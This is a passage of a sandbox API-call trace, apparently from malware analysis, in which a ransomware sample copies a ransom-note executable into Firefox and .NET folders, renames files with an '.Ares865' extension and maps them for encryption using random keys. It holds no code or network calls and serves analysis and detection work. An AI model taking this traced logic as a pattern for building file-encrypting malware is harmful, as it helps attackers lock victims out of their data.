ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0128.177] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0128.177] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2ae260, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf2ae260, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x524620c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xea0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="twitter.xml.Ares865", cAlternateFileName="TWITTE~1.ARE")) returned 1 [0128.177] lstrcmpiW (lpString1="twitter.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.177] lstrcmpiW (lpString1="twitter.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0128.178] lstrcpyW (in: lpString1=0x2cce47a, lpString2="twitter.xml.Ares865" | out: lpString1="twitter.xml.Ares865") returned="twitter.xml.Ares865" [0128.178] lstrlenW (lpString="twitter.xml.Ares865") returned 19 [0128.178] lstrlenW (lpString="Ares865") returned 7 [0128.178] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.178] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2ae260, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf2ae260, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x52488220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xbc0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wikipedia.xml.Ares865", cAlternateFileName="WIKIPE~1.ARE")) returned 1 [0128.178] lstrcmpiW (lpString1="wikipedia.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.178] lstrcmpiW (lpString1="wikipedia.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0128.178] lstrcpyW (in: lpString1=0x2cce47a, lpString2="wikipedia.xml.Ares865" | out: lpString1="wikipedia.xml.Ares865") returned="wikipedia.xml.Ares865" [0128.178] lstrlenW (lpString="wikipedia.xml.Ares865") returned 21 [0128.178] lstrlenW (lpString="Ares865") returned 7 [0128.178] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.178] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2d43c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf2d43c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x52488220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yahoo.xml.Ares865", cAlternateFileName="YAHOOX~1.ARE")) returned 1 [0128.178] lstrcmpiW (lpString1="yahoo.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.178] lstrcmpiW (lpString1="yahoo.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0128.178] lstrcpyW (in: lpString1=0x2cce47a, lpString2="yahoo.xml.Ares865" | out: lpString1="yahoo.xml.Ares865") returned="yahoo.xml.Ares865" [0128.178] lstrlenW (lpString="yahoo.xml.Ares865") returned 17 [0128.178] lstrlenW (lpString="Ares865") returned 7 [0128.178] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0128.178] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf2d43c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf2d43c0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x52488220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yahoo.xml.Ares865", cAlternateFileName="YAHOOX~1.ARE")) returned 0 [0128.178] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.179] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0128.179] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions" [0128.179] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions" [0128.179] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.179] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.180] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.180] GetLastError () returned 0x0 [0128.180] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.180] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf261fa0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x52488220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52488220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.180] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.181] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.181] lstrcpyW (in: lpString1=0x2cce474, lpString2="{972ce4c6-7e08-4474-a285-3208198ce6fd}" | out: lpString1="{972ce4c6-7e08-4474-a285-3208198ce6fd}") returned="{972ce4c6-7e08-4474-a285-3208198ce6fd}" [0128.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0128.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc2) returned 0x334fc8 [0128.181] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0128.181] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf2d43c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x524ae380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524ae380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{972ce4c6-7e08-4474-a285-3208198ce6fd}", cAlternateFileName="{972CE~1")) returned 0 [0128.181] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.181] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0128.181] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}" [0128.181] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}" [0128.181] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.181] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.182] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.182] GetLastError () returned 0x0 [0128.183] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.183] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf2d43c0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x524ae380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524ae380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.183] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.183] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.183] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="icon.png" | out: lpString1="icon.png") returned="icon.png" [0128.183] lstrlenW (lpString="icon.png") returned 8 [0128.183] lstrlenW (lpString="Ares865") returned 7 [0128.183] lstrcmpiW (lpString1="con.png", lpString2="Ares865") returned 1 [0128.183] lstrlenW (lpString=".dll") returned 4 [0128.183] lstrcmpiW (lpString1="icon.png", lpString2=".dll") returned 1 [0128.183] lstrlenW (lpString=".lnk") returned 4 [0128.183] lstrcmpiW (lpString1="icon.png", lpString2=".lnk") returned 1 [0128.183] lstrlenW (lpString=".ini") returned 4 [0128.183] lstrcmpiW (lpString1="icon.png", lpString2=".ini") returned 1 [0128.183] lstrlenW (lpString=".sys") returned 4 [0128.183] lstrcmpiW (lpString1="icon.png", lpString2=".sys") returned 1 [0128.183] lstrlenW (lpString="icon.png") returned 8 [0128.184] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.Ares865") returned 113 [0128.184] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.ares865"), dwFlags=0x1) returned 1 [0128.187] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\icon.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.187] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2185) returned 1 [0128.187] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.188] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.188] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.188] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb90, lpName=0x0) returned 0x170 [0128.190] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb90) returned 0x190000 [0128.190] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.191] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.191] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.192] lstrcpyW (in: lpString1=0x2cce4c2, lpString2="install.rdf" | out: lpString1="install.rdf") returned="install.rdf" [0128.192] lstrlenW (lpString="install.rdf") returned 11 [0128.192] lstrlenW (lpString="Ares865") returned 7 [0128.192] lstrcmpiW (lpString1="all.rdf", lpString2="Ares865") returned -1 [0128.192] lstrlenW (lpString=".dll") returned 4 [0128.192] lstrcmpiW (lpString1="install.rdf", lpString2=".dll") returned 1 [0128.192] lstrlenW (lpString=".lnk") returned 4 [0128.192] lstrcmpiW (lpString1="install.rdf", lpString2=".lnk") returned 1 [0128.192] lstrlenW (lpString=".ini") returned 4 [0128.192] lstrcmpiW (lpString1="install.rdf", lpString2=".ini") returned 1 [0128.192] lstrlenW (lpString=".sys") returned 4 [0128.192] lstrcmpiW (lpString1="install.rdf", lpString2=".sys") returned 1 [0128.192] lstrlenW (lpString="install.rdf") returned 11 [0128.192] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.Ares865") returned 116 [0128.192] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.ares865"), dwFlags=0x1) returned 1 [0128.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\extensions\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\\install.rdf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.194] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1358) returned 1 [0128.194] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.195] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.195] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.195] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x170 [0128.197] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0128.198] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.198] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.198] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.199] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components" [0128.199] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components") returned="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components" [0128.199] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.199] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.200] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.200] GetLastError () returned 0x0 [0128.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.201] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaf261fa0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x524d44e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x524d44e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.201] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.201] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.201] lstrcpyW (in: lpString1=0x2cce474, lpString2="browsercomps.dll" | out: lpString1="browsercomps.dll") returned="browsercomps.dll" [0128.201] lstrlenW (lpString="browsercomps.dll") returned 16 [0128.201] lstrlenW (lpString="Ares865") returned 7 [0128.201] lstrcmpiW (lpString1="mps.dll", lpString2="Ares865") returned 1 [0128.201] lstrlenW (lpString=".dll") returned 4 [0128.201] lstrcmpiW (lpString1="browsercomps.dll", lpString2=".dll") returned 1 [0128.201] lstrlenW (lpString=".lnk") returned 4 [0128.201] lstrcmpiW (lpString1="browsercomps.dll", lpString2=".lnk") returned 1 [0128.201] lstrlenW (lpString=".ini") returned 4 [0128.201] lstrcmpiW (lpString1="browsercomps.dll", lpString2=".ini") returned 1 [0128.201] lstrlenW (lpString=".sys") returned 4 [0128.201] lstrcmpiW (lpString1="browsercomps.dll", lpString2=".sys") returned 1 [0128.201] lstrlenW (lpString="browsercomps.dll") returned 16 [0128.202] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll.Ares865") returned 82 [0128.202] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\browsercomps.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\browsercomps.dll.ares865"), dwFlags=0x1) returned 1 [0128.203] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\browsercomps.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\browsercomps.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.203] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=272496) returned 1 [0128.203] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.204] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.204] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.204] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x42b70, lpName=0x0) returned 0x170 [0128.206] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42b70) returned 0x420000 [0128.217] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.218] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.218] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.222] lstrcpyW (in: lpString1=0x2cce474, lpString2="components.manifest" | out: lpString1="components.manifest") returned="components.manifest" [0128.222] lstrlenW (lpString="components.manifest") returned 19 [0128.222] lstrlenW (lpString="Ares865") returned 7 [0128.222] lstrcmpiW (lpString1="anifest", lpString2="Ares865") returned -1 [0128.222] lstrlenW (lpString=".dll") returned 4 [0128.222] lstrcmpiW (lpString1="components.manifest", lpString2=".dll") returned 1 [0128.222] lstrlenW (lpString=".lnk") returned 4 [0128.222] lstrcmpiW (lpString1="components.manifest", lpString2=".lnk") returned 1 [0128.222] lstrlenW (lpString=".ini") returned 4 [0128.222] lstrcmpiW (lpString1="components.manifest", lpString2=".ini") returned 1 [0128.222] lstrlenW (lpString=".sys") returned 4 [0128.222] lstrcmpiW (lpString1="components.manifest", lpString2=".sys") returned 1 [0128.222] lstrlenW (lpString="components.manifest") returned 19 [0128.223] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest.Ares865") returned 85 [0128.223] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest.ares865"), dwFlags=0x1) returned 1 [0128.225] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\components\\components.manifest.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\components\\components.manifest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.225] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34) returned 1 [0128.225] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.226] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.226] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.226] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x330, lpName=0x0) returned 0x170 [0128.228] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x330) returned 0x190000 [0128.228] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.229] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.229] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.230] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft.NET", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET") returned="C:\\Program Files (x86)\\Microsoft.NET" [0128.230] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft.NET" | out: lpString1="C:\\Program Files (x86)\\Microsoft.NET") returned="C:\\Program Files (x86)\\Microsoft.NET" [0128.230] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.230] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft.NET\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\how to back your files.exe"), bFailIfExists=1) returned 